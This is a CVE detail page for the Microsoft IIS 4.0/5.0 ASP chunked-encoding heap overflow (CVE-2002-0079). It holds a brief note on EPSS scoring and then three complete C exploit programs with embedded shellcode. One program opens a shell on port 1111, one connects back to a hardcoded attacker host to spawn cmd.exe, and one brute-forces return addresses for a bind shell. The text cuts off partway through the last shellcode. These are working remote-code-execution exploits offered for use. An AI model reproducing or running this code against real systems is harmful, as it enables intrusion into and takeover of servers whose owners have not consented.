CVE-2002-0079 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/4485/info A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services). This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host. Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable. A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves. /* Windows 2000 Server Exploit By CHINANSL Security Team. Test on Windows 2000 Chinese Version, IIS 5.0 , not patched. Warning:THIS PROGRAM WILL ONLY TEST. CHINANSL Technology CO.,LTD http://www.chinansl.com [email protected] */ #include "stdafx.h" #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #pragma comment (lib,"Ws2_32") int main(int argc, char* argv[]) { if(argc != 4) { printf("%s ip port aspfilepath\n\n",argv [0]); printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n",argv[0]); puts(" programed by [email protected]"); return 0; } DWORD srcdata=0x01e2fb1c-4;//0x00457474; //address of SHELLCODE DWORD jmpaddr=0x00457494;//0x77ebf094;//0x01e6fcec;//"\x1c\xfb\xe6 \x01";///"\x0c\xfb\xe6\x01"; char* destIP=argv[1]; char* destFile=argv[3]; int webport=atoi(argv[2]); char* pad="\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02 \x02" "PADP"; //16 bytes WSADATA ws; SOCKET s; long result=0; if(WSAStartup(0x0101,&ws) != 0) { puts("WSAStartup() error"); return -1; } struct sockaddr_in addr; addr.sin_family=AF_INET; addr.sin_port=htons(webport); addr.sin_addr.s_addr=inet_addr(destIP); s=socket(AF_INET,SOCK_STREAM,0); if(s==-1) { puts("Socket create error"); return -1; } if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == -1) { puts("Cannot connect to the specified host"); return -1; } char buff[4096]; char* shellcode= "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33 \xc9\x89" "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65 \x6c\x33\x32" "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32 \x2e\xab" "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32 \xc0\x4f" "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53 \xff\xd0\x89" "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53 \xff\xd0" "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75 \xfc\xff\xd3\x89" "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6 \x66\xbe" "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66 \xbe\x3e\x02\x56" "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56 \xff\x75\xfc" "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75 \xfc\xff\xd3\x89" "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75 \xfc\xff\xd3\x89" "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75 \xfc\xff\xd3\x89" "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45 \xe0\x6a" "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8 \xff\xd3" "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3 \x89\x45" "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13 \xff\x75\xf8" "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45 \xc8\x6a" "\x03\xff\x75\xf8\xff\xd3\x89\x85 \x1c\xff\xff\xff\x8d\x7d\xa0\x32" "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0 \xab\xf7\xd0" "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8 \xab\x33\xc0" "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50 \xff\x55" "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4 \x6a\x10" "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75 \xc4\xff" "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45 \xc0\x33" "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50 \xff\x55" "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45 \x94\x50" "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44 \x32\xc0" "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01 \x89\x47" "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89 \x47\x3c" "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85 \x38\xff" "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51 \x53\xff" "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34 \xff\xff\xff\x89" "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85 \x2c\xff\xff\xff\x50" "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85 \x2c\xff\xff\xff\x85" "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85 \x2c\xff\xff\xff\x50\x53" "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0 \x74\x6d" "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30 \xff\xff\xff\xff" "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90 \x90\x90" "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90 \x33\xc0" "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0 \xff\x55\xc8" "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50 \x8d\x85" "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30 \xff\xff" "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4 \xff\x75\xc4" "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95 \x1c\xff\xff\xff\x6a" "\xff\xff\x95\x18\xff\xff\xff"; char* s1="POST ";// HTTP/1.1\r\n"; char* s2="Accept: */*\r\n"; char* s4="Content-Type: application/x-www- form-urlencoded\r\n"; char* s5="Transfer-Encoding: chunked\r\n\r\n"; char* sc="0\r\n\r\n\r\n"; char shellcodebuff[1024*8]; memset(shellcodebuff,0x90,sizeof (shellcodebuff)); memcpy(&shellcodebuff[sizeof(shellcodebuff)- strlen(shellcode)-1],shellcode,strlen(shellcode)); shellcodebuff[sizeof(shellcodebuff)-1] = 0; char sendbuff[1024*16]; memset(sendbuff,0,1024*16); sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost: % s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n% s",s1,destFile,shellcodebuff,s2,destIP,s4,s5,pad/*,srcdata,j mpaddr*/,sc); int sendlen=strlen(sendbuff); *(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr; *(DWORD *)strstr(sendbuff,"AAAA") = srcdata; result=send(s,sendbuff,sendlen,0); if(result == -1 ) { puts("Send shellcode error!"); return -1; } memset(buff,0,4096); result=recv(s,buff,sizeof(buff),0); if(strstr(buff,"<html>") != NULL) { shutdown(s,0); closesocket(s); puts("Send shellcode error!Try again!"); return -1; } shutdown(s,0); closesocket(s); printf("\nUse <telnet %s 1111> to connect to the host\n",destIP); puts("If you cannot connect to the host,try run this program again!"); return 0; }

// source: https://www.securityfocus.com/bid/4485/info A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services). This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host. Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable. A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves. /* IIS5.0 .asp overrun remote exploit Programmed by hsj : 02.04.14 code flow: overrun -> exception -> rewrite top-level handler -> exception -> shellcode -> make back channel -> exec cmd.exe */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <sys/time.h> #include <sys/wait.h> #include <errno.h> #include <unistd.h> #include <fcntl.h> #include <netinet/in.h> #include <limits.h> #include <netdb.h> #include <arpa/inet.h> #define RET 0x0045C560 /* our payload. ugh, direct jump!!!#$% */ #define REWRITE 0x77eaf44c /* top-level exception handler */ #define PORT 25 #define ADDR "attacker.mydomain.co.jp" #define PORT_OFFSET 518 #define ADDR_OFFSET 523 unsigned char shellcode[]= /* decoder */ "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1d\x8d\xa0\xf0" "\xfb\xff\xff\x83\xe4\xfc\x8d\x6c\x24\x10\x33\xc9\x66\xb9\x85\x02" "\x80\x30\x95\x40\xe2\xfa" /* code */ "\x7d\x21\x95\x95\x95\xd2\xf0\xe1\xc5\xe7\xfa\xf6\xd4\xf1\xf1\xe7" "\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7\xec\xd4" "\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd6\xe7\xf0\xf4" "\xe1\xf0\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb" "\xf4\xf8\xf0\xf1\xc5\xfc\xe5\xf0\x95\xc2\xe7\xfc\xe1\xf0\xd3\xfc" "\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95\xc6\xf9\xf0\xf0" "\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95\xd6\xf9" "\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xe2\xe6\xa7\xca\xa6\xa7" "\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe" "\xf0\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6" "\xfa\xfb\xfb\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3" "\x95\xf6\xf8\xf1\xbb\xf0\xed\xf0\x95\xcf\xc7\x2e\x95\x95\x65\xe2" "\x14\xae\xd8\xcf\x05\x95\xe1\x96\xde\x7e\x60\x1e\xe6\xa9\x96\x66" "\x1e\xe3\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xc3\xa6\x55" "\xc2\xc4\x1e\xaa\x96\x6e\x1e\x67\xa6\x5c\x24\x9b\x66\x33\xcc\xca" "\xe1\x9d\x16\x52\x91\xd5\x77\x7d\x6a\x74\xcb\x1e\xc3\xb1\x96\x46" "\x44\x75\x96\x57\xa6\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74" "\x97\x96\x54\x1e\x85\x96\x46\xcb\x1e\x6b\xa6\x5c\x24\x9c\x7d\xdf" "\x94\x95\x95\x16\x53\x99\xc7\xc3\x6a\xc2\x49\xcf\x1e\x4d\xa6\x5c" "\x24\x93\x7d\xa3\x94\x95\x95\x16\x53\x90\x52\xd0\x95\x99\x95\x95" "\x95\x52\xd0\x91\x95\x95\x95\x95\x52\xd0\x9d\x94\x95\x95\x95\xff" "\x95\xc0\x18\xd0\x65\xc5\x18\xd0\x61\xc5\x6a\xc2\x5d\xff\x95\xc0" "\x18\xd0\x6d\xc5\x18\xd0\x69\xc5\x6a\xc2\x5d\xa6\x55\xa6\x5c\x24" "\x84\xc2\x1e\x68\x66\x3e\xca\x52\xd0\x95\xd1\x95\x95\x95\x1e\xd0" "\x65\x1c\xd0\xa9\x1c\xd0\xd5\x1e\xd0\x69\x1c\xd0\xad\x52\xd0\xb9" "\x94\x94\x95\x95\x18\xd0\xd1\xc5\xc0\xc4\xc4\xc4\xd4\xc4\xdc\xc4" "\xc4\xc3\xc4\x6a\xc2\x59\x6a\xe0\x65\x6a\xc2\x71\x6a\xe0\x69\x6a" "\xc2\x71\xc0\xfd\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x30" "\x95\x95\x95\xc5\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11" "\x01\x95\x95\x95\x1e\x4d\xf3\x52\xd0\x95\x97\x95\xf3\x52\xd0\x97" "\x2e\x3f\x52\xd0\x91\x48\x59\x2e\x3f\xff\x85\xc0\xc6\x6a\xc2\x61" "\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc2\xc4\xc4\xc4\x6a\xe0\x61\x6a" "\xc2\x45\x10\x55\xe1\xcb\x05\x05\x05\x05\x16\xaa\x95\xe1\xba\x05" "\x05\x05\x05\xff\x95\xc2\xfd\x95\x91\x95\x95\xc0\x6a\xe0\x61\x6a" "\xc2\x4d\x10\x55\xe1\xab\x05\x05\x05\x05\xff\x95\x6a\xa2\xc0\xc6" "\x6a\xc2\x6d\x16\x6d\x6a\xe1\xb9\x05\x05\x05\x05\x7e\x27\xff\x95" "\xfd\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xeb\x83\x05\x05" "\x05\x05\xff\x95\xc2\xc5\xc0\x6a\xe0\x6d\x6a\xc2\x41\xff\xa7\x6a" "\xc2\x49\x7e\x19\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\x1f\x93\xd3" "\x11\x55\xe0\x6c\xc4\xc7\xc3\xc6\x6a\x47\xcf\xcc\x1c\x92\xd2\xd2" "\xd2\xd2\x77\x7c\x56"; unsigned int resolve(char *name) { struct hostent *he; unsigned int ip; if((ip=inet_addr(name))==(-1)) { if((he=gethostbyname(name))==0) return 0; memcpy(&ip,he->h_addr,4); } return ip; } int make_connection(char *address,int port) { struct sockaddr_in server,target; int s,i,bf; fd_set wd; struct timeval tv; s = socket(AF_INET,SOCK_STREAM,0); if(s<0) return -1; memset((char *)&server,0,sizeof(server)); server.sin_family = AF_INET; server.sin_addr.s_addr = htonl(INADDR_ANY); server.sin_port = 0; target.sin_family = AF_INET; target.sin_addr.s_addr = resolve(address); if(target.sin_addr.s_addr==0) { close(s); return -2; } target.sin_port = htons(port); bf = 1; ioctl(s,FIONBIO,&bf); tv.tv_sec = 10; tv.tv_usec = 0; FD_ZERO(&wd); FD_SET(s,&wd); connect(s,(struct sockaddr *)&target,sizeof(target)); if((i=select(s+1,0,&wd,0,&tv))==(-1)) { close(s); return -3; } if(i==0) { close(s); return -4; } i = sizeof(int); getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i); if((bf!=0)||(i!=sizeof(int))) { close(s); errno = bf; return -5; } ioctl(s,FIONBIO,&bf); return s; } int main(int argc,char *argv[]) { int i,j,s; unsigned int cb; unsigned short port; char buf[8192],buf2[16384],path[256]; if(argc<3) { printf("usage :$ %s ip port [asp-path]\n",argv[0]); return -1; } if(argc>3) { strncpy(path,argv[3],sizeof(path)); path[sizeof(path)-1] = 0; } else strcpy(path,"/iisstart.asp"); if(!(cb=resolve(ADDR))) return -2; s = make_connection(argv[1],atoi(argv[2])); if(s<0) { printf("connect error:[%d].\n",s); return -3; } j = strlen(shellcode); port = htons(PORT); port ^= 0x9595; cb ^= 0x95959595; *(unsigned short *)&shellcode[PORT_OFFSET] = port; *(unsigned int *)&shellcode[ADDR_OFFSET] = cb; for(i=0;i<strlen(shellcode);i++) { if(((shellcode[i]>=0x09)&&(shellcode[i]<=0x0d))|| (shellcode[i]==0x25)||(shellcode[i]==0x2b)|| (shellcode[i]==0x3d)) break; } if(i!=j) { printf("bad portno or ip address...\n"); close(s); return -4; } for(i=0;i<sizeof(buf)-strlen(shellcode)-12-1;) { buf[i++] = 0xeb; buf[i++] = 0x06; } *(unsigned int *)&buf[i] = 0x41414141; *(unsigned int *)&buf[i+4] = 0x41414141; *(unsigned int *)&buf[i+8] = 0x41414141; memcpy(&buf[sizeof(buf)-strlen(shellcode)-1],shellcode,strlen(shellcode)); buf[sizeof(buf)-1] = 0; sprintf(buf2,"POST %s?%s HTTP/1.0\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Transfer-Encoding: chunked\r\n\r\n" "10\r\nABCDEFGHIJKLMNOP\r\n" "4\r\nXXXX\r\n" "4\r\nYYYY\r\n" "0\r\n\r\n\r\n", path,buf); j = strlen(buf2); *(unsigned int *)strstr(buf2,"YYYY") = REWRITE; *(unsigned int *)strstr(buf2,"XXXX") = RET; write(s,buf2,j); printf("---"); for(i=0;i<j;i++) { if((i%16)==0) printf("\n"); printf("%02X ",buf2[i]&0xff); } printf("\n---\n"); sleep(3); shutdown(s,2); close(s); printf("Done.\n"); return 0; }

// source: https://www.securityfocus.com/bid/4485/info A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services). This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host. Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable. A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves. /* * DDK - 2k2 - * * * coded by NeMeS||y tnx to Birdack * * */ // IIS 4(NT4) - IIS 5(2K) .asp bof #include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <sys/time.h> #include <sys/wait.h> #include <errno.h> #include <unistd.h> #include <fcntl.h> #include <netinet/in.h> #include <limits.h> #include <netdb.h> #include <arpa/inet.h> #define RET_BRUTE_START 0x00400000 #define RET_BRUTE_STOP 0x00500000 #define PORT_BIND 7788 #define VERSION "0.3b" unsigned char wincode[] = "\xeb\x18\x5f\x57\x5e\x33\xc9\xac\x3a\xc1\x74\x13\x3c\x30\x74\x05" "\x34\xaa\xaa\xeb\xf2\xac\x2c\x40\xeb\xf6\xe8\xe3\xff\xff\xff\xff" "\x21\x46\x30\x6b\x46\xea\xa3\xaa\xaa\xf9\xfc\xfd\x27\x17\x6a\x30" "\x9c\x55\x55\x13\xfa\xa8\xaa\xaa\x12\x66\x66\x66\x66\x59\x30\x41" "\x6d\x30\x6f\x30\x46\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x30\x6f\x9e" "\x5d\x55\x55\xba\xaa\xaa\xaa\x43\x48\xac\xaa\xaa\x30\x65\x30\x6f" "\x30\x42\x5d\x55\x55\x27\x17\x5e\x5d\x55\x55\xce\x30\x4b\xaa\xaa" "\xaa\xaa\x23\xed\xa2\xce\x23\x97\xaa\xaa\xaa\xaa\x6d\x30\x6f\x5e" "\x5d\x55\x55\x55\x55\x55\x55\x21\x30\x6f\x30\x42\x5d\x55\x55\x29" "\x42\xad\x23\x30\x6f\x52\x5d\x55\x55\x6d\x30\x6f\x30\x4e\x5d\x55" "\x55\xaa\xaa\x4a\xdd\x42\xd4\xac\xaa\xaa\x29\x17\x30\x46\x5d\x55" "\x55\xaa\xa5\x30\x6f\x77\xab\xaa\xaa\x21\x27\x30\x4e\x5d\x55\x55" "\x30\x6b\x6b\xaa\xaa\xab\xaa\x23\x27\x30\x4e\x5d\x55\x55\x30\x6b" "\x17\x30\x4e\x5d\x55\x55\xaa\xaa\xaa\xd2\xdf\xa0\x6d\x30\x6f\x30" "\x4e\x5d\x55\x55\xaa\xaa\x5a\x15\x21\x30\x7f\x30\x4e\x5d\x55\x55" "\x99\x6a\xcc\x21\xa8\x97\xe7\xf0\xaa\xaa\xa5\x30\x6f\x30\x70\xab" "\xaa\xaa\x21\x27\x30\x4e\x5d\x55\x55\x21\xfb\x96\x21\x30\x6f\x30" "\x4e\x5d\x55\x55\x99\x63\xcc\x21\xa6\xba\x30\x6b\x53\xfa\xef\xaa" "\xaa\xa5\x30\x6f\xd3\xab\xaa\xaa\x21\x30\x7f\x30\x4e\x5d\x55\x55" "\x21\xe8\x96\x21\x27\x30\x4e\x5d\x55\x55\x21\xfe\xab\xd2\xa9\x30" "\x7f\x30\x4e\x5d\x55\x55\x23\x30\x7f\x30\x4a\x5d\x55\x55\x21\x30" "\x6f\x30\x4a\x5d\x55\x55\x21\xe2\xa6\xa9\x27\x30\x4e\x5d\x55\x55" "\x23\x27\x36\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\x30\x6b\x90" "\xe1\xef\xf8\xe4\xa5\x30\x6f\x99\xab\xaa\xaa\x21\x30\x6f\x36\x5d" "\x55\x55\x30\x6b\xd2\xae\xef\xe6\x99\x98\xa5\x30\x6f\x8a\xab\xaa" "\xaa\x21\x27\x30\x4e\x5d\x55\x55\x23\x27\x3e\x5d\x55\x55\x21\x30" "\x7f\x30\x4a\x5d\x55\x55\x21\x30\x6f\x30\x4e\x5d\x55\x55\xa9\xe8" "\x8a\x23\x30\x6f\x36\x5d\x55\x55\x6d\x30\x6f\x32\x5d\x55\x55\xaa" "\xaa\xaa\xaa\x41\xb4\x21\x27\x32\x5d\x55\x55\x29\x6b\xab\x23\x27" "\x32\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\x29\x68\xae\x23\x30" "\x7f\x36\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d\x55\x55\x21\x27\x32" "\x5d\x55\x55\x91\xe2\xb2\xa5\x27\x6a\xaa\xaa\xaa\x21\x30\x7f\x36" "\x5d\x55\x55\x21\xa8\x21\x27\x30\x4e\x5d\x55\x55\x30\x6b\x96\xab" "\xed\xcf\xde\xfa\xa5\x30\x6f\x30\x4a\xaa\xaa\xaa\x21\x30\x7f\x36" "\x5d\x55\x55\x21\xa8\x21\x27\x30\x4e\x5d\x55\x55\x30\x6b\xd6\xab" "\xae\xd8\xc5\xc9\xeb\xa5\x30\x6f\x30\x6e\xaa\xaa\xaa\x21\x30\x7f" "\x32\x5d\x55\x55\xa9\x30\x7f\x32\x5d\x55\x55\xa9\x30\x7f\x30\x4e" "\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d\x55\x55\x21\xe2\x8e\x99\x6a" "\xcc\x21\xae\xa0\x23\x30\x6f\x36\x5d\x55\x55\x21\x27\x30\x4a\x5d" "\x55\x55\x21\xfb\xba\x21\x30\x6f\x36\x5d\x55\x55\x27\xe6\xba\x55" "\x23\x27\x36\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\xa9\x30\x7f" "\x36\x5d\x55\x55\xa9\x30\x7f\x36\x5d\x55\x55\xa9\x30\x7f\x36\x5d" "\x55\x55\xa9\x30\x7f\x30\x4e\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d" "\x55\x55\x21\xe2\xb6\x21\xbe\xa0\x23\x30\x7f\x36\x5d\x55\x55\x21" "\x30\x6f\x36\x5d\x55\x55\xa9\x30\x6f\x30\x4e\x5d\x55\x55\x23\x30" "\x6f\x30\x46\x5d\x55\x55\x41\xaf\x43\xa7\x55\x55\x55\x43\xbc\x54" "\x55\x55\x27\x17\x5e\x5d\x55\x55\x21\xed\xa2\xce\x30\x49\xaa\xaa" "\xaa\xaa\x29\x17\x30\x46\x5d\x55\x55\xaa\xdf\xaf\x43\xdf\xae\xaa" "\xaa\x21\x27\x30\x42\x5d\x55\x55\xcc\x21\xbb\xcc\x23\x30\x7f\x86" "\x5d\x55\x55\x21\x30\x6f\x30\x42\x5d\x55\x55\x29\x6a\xa8\x23\x30" "\x6f\x30\x42\x5d\x55\x55\x6d\x30\x6f\x36\x5d\x55\x55\xab\xaa\xaa" "\xaa\x41\xa5\x21\x27\x36\x5d\x55\x55\x29\x6b\xab\x23\x27\x36\x5d" "\x55\x55\x29\x17\x36\x5d\x55\x55\xbb\xa5\x27\x30\x7f\xaa\xaa\xaa" "\x29\x17\x36\x5d\x55\x55\xa2\xdf\xb4\x21\x5e\x21\x30\x7f\x30\x42" "\x5d\x55\x55\xf8\x55\x30\x7f\x1e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" "\xe9\xe1\x23\x30\x6f\x3e\x5d\x55\x55\x41\x80\x21\x5e\x21\x30\x6f" "\x30\x42\x5d\x55\x55\xfa\x21\x27\x3e\x5d\x55\x55\xfb\x55\x30\x7f" "\x30\x46\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x21\x30\x7f\x36" "\x5d\x55\x55\x23\x30\x6e\x30\x7f\x1a\x5d\x55\x55\x41\xa5\x21\x30" "\x6f\x30\x42\x5d\x55\x55\x29\x6a\xab\x23\x30\x6f\x30\x42\x5d\x55" "\x55\x21\x27\x30\x42\x5d\x55\x55\xa5\x14\xbb\x30\x6f\x78\xdf\xba" "\x21\x30\x6f\x30\x42\x5d\x55\x55\xa5\x14\xe2\xab\x30\x6f\x63\xde" "\xa8\x41\xa8\x41\x78\x21\x30\x7f\x30\x42\x5d\x55\x55\x29\x68\xab" "\x23\x30\x7f\x30\x42\x5d\x55\x55\x43\xe5\x55\x55\x55\x21\x5e\xc0" "\xac\xc0\xab\xc0\xa8\x55\x30\x7f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9" "\xe1\xe9\xe1\x23\x30\x6f\xe6\x5d\x55\x55\xcc\x6d\x30\x6f\x92\x5d" "\x55\x55\xa8\xaa\xcc\x21\x30\x6f\x86\x5d\x55\x55\xcc\x23\x30\x6f" "\x90\x5d\x55\x55\x6d\x30\x6f\x96\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d" "\x30\x6f\x36\x5d\x55\x55\xab\xaa\xaa\xaa\x29\x17\x36\x5d\x55\x55" "\xaa\xde\xf5\x21\x5e\xc0\xba\x27\x27\x92\x5d\x55\x55\xfb\x21\x30" "\x7f\xe6\x5d\x55\x55\xf8\x55\x30\x7f\x72\x5d\x55\x55\x91\x5e\x3a" "\xe9\xe1\xe9\xe1\x23\x30\x6f\x36\x5d\x55\x55\xcc\x21\x30\x6f\x90" "\x5d\x55\x55\xcc\xaf\xaa\xab\xcc\x23\x30\x6f\x90\x5d\x55\x55\x21" "\x27\x90\x5d\x55\x55\x30\x6b\x4b\x55\x55\xaa\xaa\x30\x6b\x53\xaa" "\xab\xaa\xaa\xd7\xb8\xcc\x21\x30\x7f\x90\x5d\x55\x55\xcc\x29\x68" "\xab\xcc\x23\x30\x7f\x90\x5d\x55\x55\x41\x32\x21\x5e\xc0\xa0\x21" "\x30\x6f\xe6\x5d\x55\x55\xfa\x55\x30\x7f\x76\x5d\x55\x55\x91\x5e" "\x3a\xe9\xe1\xe9\xe1\x13\xab\xaa\xaa\xaa\x30\x6f\x63\xa5\x30\x6e" "\x6c\xa8\xaa\xaa\x21\x5e\x27\x30\x7f\x9e\x5d\x55\x55\xf8\x27\x30" "\x6f\x92\x5d\x55\x55\xfa\x21\x27\xe6\x5d\x55\x55\xfb\x55\x30\x7f" "\x4a\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x30\x6f\xe2\x5d" "\x55\x55\x6d\x30\x6f\xaa\x5d\x55\x55\xa6\xaa\xaa\xaa\x6d\x30\x6f" "\xae\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x30\x6f\xa2\x5d\x55\x55\xab" "\xaa\xaa\xaa\x21\x5e\xc0\xaa\x27\x30\x7f\xaa\x5d\x55\x55\xf8\x27" "\x30\x6f\xbe\x5d\x55\x55\xfa\x27\x27\xb2\x5d\x55\x55\xfb\x55\x30" "\x7f\x12\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x21\x5e\xc0\xaa" "\x27\x30\x7f\xaa\x5d\x55\x55\xf8\x27\x30\x6f\xa6\x5d\x55\x55\xfa" "\x27\x27\xba\x5d\x55\x55\xfb\x55\x30\x7f\x12\x5d\x55\x55\x91\x5e" "\x3a\xe9\xe1\xe9\xe1\x27\x17\xfa\x5d\x55\x55\x99\x6a\x13\xbb\xaa" "\xaa\xaa\x58\x30\x41\x6d\x30\x6f\xd6\x5d\x55\x55\xab\xab\xaa\xaa" "\xcc\x6d\x30\x6f\x2a\x5d\x55\x55\xaa\xaa\x21\x30\x7f\xba\x5d\x55" "\x55\x23\x30\x7f\x22\x5d\x55\x55\x21\x30\x6f\xbe\x5d\x55\x55\x23" 